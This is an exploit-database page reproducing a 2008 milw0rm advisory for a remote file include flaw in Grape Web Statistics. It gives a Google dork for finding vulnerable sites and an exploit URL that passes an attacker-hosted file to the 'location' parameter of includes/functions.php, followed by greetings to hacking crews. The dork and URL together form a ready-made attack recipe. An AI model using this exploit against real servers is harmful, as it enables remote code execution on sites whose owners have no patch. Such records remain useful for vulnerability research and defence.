Grape Web Statistics Remote File include Vulnerability

vendor:

Grape Web Statistics

by:

MajnOoNxHaCkEr

9.3

CVSS

HIGH

Remote File Include

CWE

Product Name: Grape Web Statistics

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Grape Web Statistics Remote File include Vulnerability

A remote file include vulnerability exists in Grape Web Statistics, which allows an attacker to include a remote file containing malicious code, resulting in arbitrary code execution.

Mitigation:

No known mitigation

Source

Exploit-DB raw data:

# Name : Grape Web Statistics Remote File include Vulnerability
# Download From :http://www.quate.net/link.php?grape
# Found By : MajnOoNxHaCkEr                  
# Home Page : http://www.4rxh.com
============================================================================
# Vulne Code In File functions.php :

#Function: require

# DorK In GooGle : "Developed by Quate.net."

# Exploit:

http://WwW.4RxH.CoM/[PaTh]/includes/functions.php?location=[EV!L]

That,s It,s

Good Luck Everybody
============================================================================

# Greet To :

"RoMaNcYxHaCkEr My Master , BlackxHat" 

RoMaNTiC TeaM :"SaudiXKafoOo ,  Gn6.AlSfeeNh , Kill EyE , Ghost Of The Sky , ABOOD_700 , Ã¢â‚¬ÂSiL3nT M4n  , x-man"  (WwW.4RxH.CoM)

" O2 HaCkEr , Cutthroat hacker ,  SnakE1095 , GaMe-OvEr-haCkeRs  "

 And All My Friends

# For Contact : MajnOoNxHaCkEr@wInDoWsLiVe.CoM

# milw0rm.com [2008-04-18]